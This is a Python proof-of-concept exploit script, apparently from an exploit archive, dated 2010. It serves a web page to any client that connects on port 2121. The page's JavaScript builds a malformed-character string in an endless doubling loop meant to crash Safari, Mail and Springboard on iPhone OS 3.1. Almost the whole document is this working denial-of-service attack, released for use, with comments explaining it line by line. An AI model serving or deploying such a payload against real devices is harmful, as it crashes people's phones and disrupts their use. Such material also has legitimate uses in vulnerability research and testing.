#!/usr/bin/python

# iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ OS 3.1.3.
# This script acts as a web server and causes Safari, as well as Mail and Springboard, to crash.
# All of these apps crash after the exploit is run on the iPhone. I was unable to debug any of these
# processes because the gdb on my device is acting up, and the original iPhone has too little memory
# to test this exploit further, so I am releasing it.

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE :
# Code : none

import sys, socket;
def main():
    """Serve a fixed HTML page to every client that connects on TCP port 2121.

    The page's ``onLoad`` handler calls ``triggerCrash()``, which starts from a
    three-character string and keeps concatenating it with itself inside
    ``while (i < 1000)``.  Nothing in the loop changes ``i``, so as written the
    doubling has no exit condition, and the ``innerHTML`` assignment placed
    after the loop only runs if the loop ends.

    The listener speaks raw TCP: it prints up to 1024 bytes of whatever the
    client sent, writes the page back with no HTTP status line or headers, and
    closes the connection.  Connections are handled one at a time and the
    function never returns on its own.

    Written for Python 2: the ``str`` page is passed straight to ``send()``.
    """
    # Plain (non-raw) Python literal: "\x4e\x5b\x01" is decoded by Python, so
    # the script the client receives holds the characters "N", "[" and a raw
    # 0x01 byte rather than JavaScript escape sequences.
    html = """
<html>
<head>
<script>
function triggerCrash(){
evil_div = document.getElementById('evilDiv');
var evil_string = "\x4e\x5b\x01";
i = 0;

while (i < 1000){
evil_string = evil_string + evil_string;
}

evil_div.innerHTML = evil_string;
}
</script>
</head>
<body onLoad="triggerCrash()">
<div id="evilDiv">

</div>
</body>
</html>
"""

    # '' binds every local interface, so any host that can reach port 2121 is
    # served the page; listen(1) keeps a backlog of one pending connection.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(('', 2121))
    listener.listen(1)

    while True:
        conn, _peer = listener.accept()
        # Echo the request to stdout; its content is not parsed or checked.
        request = conn.recv(1024)
        print(request)
        conn.send(html)
        conn.close()
# Start the listener as soon as the script runs; main() loops forever, so this
# call does not return normally.
main()